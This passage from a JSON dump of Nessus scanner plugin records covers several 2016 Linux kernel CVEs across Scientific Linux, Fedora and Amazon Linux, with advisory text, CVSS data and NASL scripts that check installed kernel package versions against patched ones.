(requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the system.\n (CVE-2016-8655, Important)\n\n - A flaw was discovered in the Linux kernel's\n implementation of VFIO. An attacker issuing an ioctl can\n create a situation where memory is corrupted and modify\n memory outside of the expected area. This may overwrite\n kernel memory and subvert kernel execution.\n (CVE-2016-9083, Important)\n\n - The use of a kzalloc with an integer multiplication\n allowed an integer overflow condition to be reached in\n vfio_pci_intrs.c. 
This combined with CVE-2016-9083 may\n allow an attacker to craft an attack and use unallocated\n memory, potentially crashing the machine.\n (CVE-2016-9084, Moderate)", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20170302)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-03T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20170302_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/97516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97516);\n script_version(\"3.8\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20170302)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - Linux kernel built with the Kernel-based Virtual Machine\n (CONFIG_KVM) support is vulnerable to a NULL pointer\n dereference flaw. It could occur on x86 platform, when\n emulating an undefined instruction. An attacker could\n use this flaw to crash the host kernel resulting in DoS.\n (CVE-2016-8630, Important)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the system.\n (CVE-2016-8655, Important)\n\n - A flaw was discovered in the Linux kernel's\n implementation of VFIO. An attacker issuing an ioctl can\n create a situation where memory is corrupted and modify\n memory outside of the expected area. This may overwrite\n kernel memory and subvert kernel execution.\n (CVE-2016-9083, Important)\n\n - The use of a kzalloc with an integer multiplication\n allowed an integer overflow condition to be reached in\n vfio_pci_intrs.c. 
This combined with CVE-2016-9083 may\n allow an attacker to craft an attack and use unallocated\n memory, potentially crashing the machine.\n (CVE-2016-9084, Moderate)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1703&L=scientific-linux-errata&F=&S=&P=761\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ecfa446\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:01", "description": "The 4.8.8 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.8.7 kernel rebase contains new hardware support, additional\nfeatures, and a number of important bug fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block 
directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-25T00:00:00", "title": "Fedora 23 : kernel (2016-ee3a114958)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-8645"], "modified": "2016-11-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-EE3A114958.NASL", "href": "https://www.tenable.com/plugins/nessus/95308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-ee3a114958.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95308);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8645\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"FEDORA\", value:\"2016-ee3a114958\");\n\n script_name(english:\"Fedora 23 : kernel (2016-ee3a114958)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.8.8 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.8.7 kernel rebase contains new hardware support, additional\nfeatures, and a number of important bug fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to 
automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-ee3a114958\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8645\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-ee3a114958\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.8.8-100.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-01-01T01:19:29", "description": "CVE-2016-8645 kernel: a BUG() statement can be hit in\nnet/ipv4/tcp_input.c\n\nIt was discovered that the Linux kernel since 3.6-rc1 with\nnet.ipv4.tcp_fastopen; set to 1 can hit BUG() statement in\ntcp_collapse() function after making a number of certain syscalls\nleading to a possible system crash.\n\nCVE-2016-8655 kernel: Race condition in packet_set_ring leads to use\nafter free\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nCVE-2016-9083 kernel: State machine confusion bug in vfio driver\nleading to memory corruption\n\nA flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution.\n\nCVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio\ndriver\n\nThe use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. 
This combined\nwith CVE-2016-9083 may allow an attacker to craft an attack and use\nunallocated memory, potentially crashing the machine.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2016-772)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-9083", "CVE-2016-8645"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-772.NASL", "href": "https://www.tenable.com/plugins/nessus/95609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-772.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95609);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-8645\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"ALAS\", value:\"2016-772\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-772)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-8645 kernel: a BUG() statement can be hit 
in\nnet/ipv4/tcp_input.c\n\nIt was discovered that the Linux kernel since 3.6-rc1 with\nnet.ipv4.tcp_fastopen; set to 1 can hit BUG() statement in\ntcp_collapse() function after making a number of certain syscalls\nleading to a possible system crash.\n\nCVE-2016-8655 kernel: Race condition in packet_set_ring leads to use\nafter free\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nCVE-2016-9083 kernel: State machine confusion bug in vfio driver\nleading to memory corruption\n\nA flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution.\n\nCVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio\ndriver\n\nThe use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. 
This combined\nwith CVE-2016-9083 may allow an attacker to craft an attack and use\nunallocated memory, potentially crashing the machine.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-772.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", 
reference:\"kernel-debuginfo-common-i686-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.4.35-33.55.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:33", "description": "The 4.8.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "title": "Fedora 24 : kernel (2016-96d276367e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-9083"], "modified": 
"2016-11-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-96D276367E.NASL", "href": "https://www.tenable.com/plugins/nessus/94617", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-96d276367e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94617);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"FEDORA\", value:\"2016-96d276367e\");\n\n script_name(english:\"Fedora 24 : kernel (2016-96d276367e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n 